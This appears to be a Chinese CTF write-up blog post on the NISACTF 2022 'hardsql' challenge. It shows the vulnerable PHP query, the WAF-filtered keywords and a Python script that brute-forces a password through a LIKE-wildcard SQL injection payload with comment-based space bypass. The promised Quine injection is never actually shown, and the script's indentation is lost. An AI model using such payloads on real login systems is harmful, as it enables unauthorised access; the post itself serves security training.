SQL注入之Quine注入
2 分钟
前言
一、Quine是什么?
二、[NISACTF 2022]hardsql
前言
提示:这里可以添加本文要记录的大概内容:
SQL注入的各种手段很多,今天做CTF题的时候,又遇到了一种不常考的但是很细节的注入,记录一下。
提示:以下是本篇文章正文内容,下面案例可供参考
一、Quine是什么?
Quine指的是自产生程序,简单的说,就是输入的sql语句与要输出的一致,下面是例题。
二、[NISACTF 2022]hardsql
题目提示:
$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and
passwd='$password';";
1,进入题目:
题目说登录的账号为bilala,只有登录密码是可注入的点,首先要进行登录,进行一些常规注入的小尝试,发现存在waf过滤了空格,and,updatexml,=,database,sleep,information_schema之类的,过滤的挺多。可以利用like+通配符%进行密码的爆破,爆破脚本如下:
import requests
url = 'http://1.14.71.254:28860/login.php'
str = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
flag = ''
for i in range(62):
for j in str:
data = {
'username': 'bilala', "passwd":f"-1'/**/or/**/passwd/**/like/**/'{flag+j}%'#"
}
response = requests.post(url, data=data)
if "nothing found" not in response.text:
flag = flag + j
print(flag)
break
print(flag)
登录进去后,看到了源码:
alert('{$mes}');location.href='{$url}';
~ ~ The End ~ ~
分类标签:Web安全,CTF
文章标题:SQL注入之Quine注入
文章链接:https://aiwin.fun/index.php/archives/1107/
最后编辑:2024 年 1 月 4 日 17:08 By Aiwin
许可协议: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)
文章标题:SQL注入之Quine注入
文章链接:https://aiwin.fun/index.php/archives/1107/
最后编辑:2024 年 1 月 4 日 17:08 By Aiwin
许可协议: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)